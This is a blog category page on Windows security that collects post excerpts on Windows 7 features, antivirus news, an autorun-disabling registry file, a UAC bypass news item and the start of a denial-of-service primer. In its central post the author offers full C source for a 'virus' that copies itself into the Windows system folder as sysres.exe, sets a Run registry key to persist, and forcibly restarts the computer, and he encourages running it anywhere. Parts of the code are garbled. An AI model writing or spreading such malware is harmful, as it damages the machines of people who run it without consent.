Ahsun Taquveem Chohan

    The Blog for computer scientists

    Browsing Posts in Windows Security

    Microsoft’s newest operating system, Windows 7, offers a new feature that allows you to disable or turn off any application you don’t want without any hassle.

    Originally posted here:
    Disable Windows 7 feature which you don't need

    Kaspersky Anti-Virus for Windows 7 accompanies the first steps of the Microsoft with a declination of its security suite tailored to the operating system to come. Presented by his publisher as a prototype, Kaspersky Anti-Virus for …

    Originally posted here: 
    Kaspersky Anti-Virus:One of the first security suite for Windows 7 …

    Paul Cooke at Microsoft now responded on The windows security blog. He first agreed that. users of any computer, on any platform, should run anti-virus software, including those running windows 7

    Read more:
    Microsoft Responded To Sophos Windows 7 Vulnerability Claim …

    Comprehensive Microsoft -Ready infrastructure that enhances the performance, security , and availabili… Microsoft Windows Storage Server 2003. Windows Storage Server 2003 is a dedicated file server that offers dependable storage while …

    See the original post:
    Free PDF: Microsoft Windows Server 2003 | Free ebook manual …

    How to disable autorun(.inf) to prevent autorun Trojan
    To disable Autorun system wide (for all users) on all the drives:
    save the following script as .reg -file and double-click it (melt it with registry)

    ======================================================Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]"HonorAutoRunSetting"=dword:00000001"NoDriveTypeAutoRun"=dword:000000ff
    
    =======================================================

    continue reading…

    Many people asked me how to create viruses etc stuff. Here is a simple virus/program which will restart your computer when opened. All you have to do is compile it and then run it where ever you want. Don’t worry if you run it accidentally on your system, I’ll also tell you how to remove this virus from your system completely.

    :-)

    Source Code:

    #include<stdio.h>
    
    #include<dos.h>
    
    #include<dir.h> /If you get error, try using direct.h, if still you get error try compiling it in windows xp
    
    int found,drive_no;char buff[128];
    
    void findroot()
    
    {
    
    int done;
    
    struct ffblk ffblk; //File block structure
    
    done=findfirst("C:\\windows\\system",&ffblk,FA_DIREC); //to determine the root drive
    
    if(done==0)
    
    {
    
    done=findfirst("C:\\windows\\system\\sysres.exe",&ffblk,0); //to determine whether the virus is already installed or not
    
    if(done==0)
    
    {
    
    found=1; //means that the system is already infected
    
    return;
    
    }
    
    drive_no=1;
    
    return;
    
    }
    
    done=findfirst("D:\\windows\\system",&ffblk,FA_DIREC);
    
    if(done==0)
    
    {
    
    done=findfirst("D:\\windows\\system\\sysres.exe",&ffblk,0);
    
    if
    
    (done==0)
    
    {
    
    found=1;return;
    
    }
    
    drive_no=2;
    
    return;
    
    }
    
    done=findfirst("E:\\windows\\system",&ffblk,FA_DIREC);
    
    if(done==0)
    
    {
    
    done=findfirst("E:\\windows\\system\\sysres.exe",&ffblk,0);
    
    if(done==0)
    
    {
    
    found=1;
    
    return;
    
    }
    
    drive_no=3;
    
    return;
    
    }
    
    done=findfirst("F:\\windows\\system",&ffblk,FA_DIREC);
    
    if(done==0)
    
    {
    
    done=findfirst("F:\\windows\\system\\sysres.exe",&ffblk,0);
    
    if(done==0)
    
    {
    
    found=1;
    
    return;
    
    }
    
    drive_no=4;
    
    return;
    
    }
    
    else
    
    exit(0);
    
    }
    
    void main()
    
    {
    
    FILE *self,*target;
    
    findroot();
    
    if(found==0) //if the system is not already infected
    
    {
    
    self=fopen(_argv[0],”rb”); //The virus file open’s itself
    
    switch(drive_no)
    
    {
    
    case 1:
    
    target=fopen("C:\\windows\\system\\sysres.exe","welcome back"); //to place a copy of itself in a remote place
    
    system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/d C:\\windows\\system\\ sysres.exe"); //put this file to registry for starup
    
    break;
    
    case 2:
    
    target=fopen("D:\\windows\\system\\sysres.exe","welcome back");
    
    system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dD:\\windows\\system\\sysres.exe");
    
    break;
    
    case 3:
    
    target=fopen("E:\\windows\\system\\sysres.exe","welcome back");
    
    system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dE:\\windows\\system\\sysres.exe");
    
    break;
    
    case 4:
    
    target=fopen("F:\\windows\\system\\sysres.exe","welcome back");
    
    system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dF:\\windows\\system\\sysres.exe");
    
    break;
    
    default:
    
    exit(0);
    
    }
    
    while(fread(buff,1,1,self)>0)
    
    fwrite(buff,1,1,target);
    
    fcloseall();
    
    }
    
    else
    
    system("shutdown -r -t 0"); //if the system is already infected then just give a command to restart
    
    }

    How to recover/remove the virus:

    1) Open up PC in safe mode

    2) C:\windows:\system … you will find it(sysres) so delete it !

    3) open registry :

    HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

    4) You will find it also delete it …

    If anything else goes wrong, feel free to contact me :-)

    Windows 7 (formerly known as Vienna and Blackcomb) is a complete new version in windows series introduced by Microsoft for use on personal computers, including business PC’s. There is a close relation between security and usability, which the software developers often sacrifice for the other.

    Microsoft is NO Exception.

    continue reading…

    Anyone who knows anything about security knows that this kind of disaster was only a matter of time. Windows botnets are responsible for DDoS attacks and most of e-mail spam. You cannot secure Windows .

    Continued here:
    It’s time to get rid of Windows – Computerworld Blogs

    Leo Davidson released a proof-of-concept showcasing Windows 7 User Account Control feature flaw elevating a command prompt window using the whitelisted explorer.exe process.

    Go here to read the rest:
    Microsoft Security Essentials lists Windows 7 UAC hack as malware

    A- INTRODUCTION
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    A-1. WHAT IS A DENIAL OF SERVICE ATTACK
    ———————————————————
    Denial of service is about without permission knocking off services, for example through crashing the whole system. This kind of attacks are easy to launch and it is hard to protect a system against them. The basic problem is that Unix assumes that users on the system or on other systems will be well behaved

    continue reading…

    Powered by WordPress Web Design by SRS Solutions © 2010 Ahsun Taquveem Chohan Design by SRS Solutions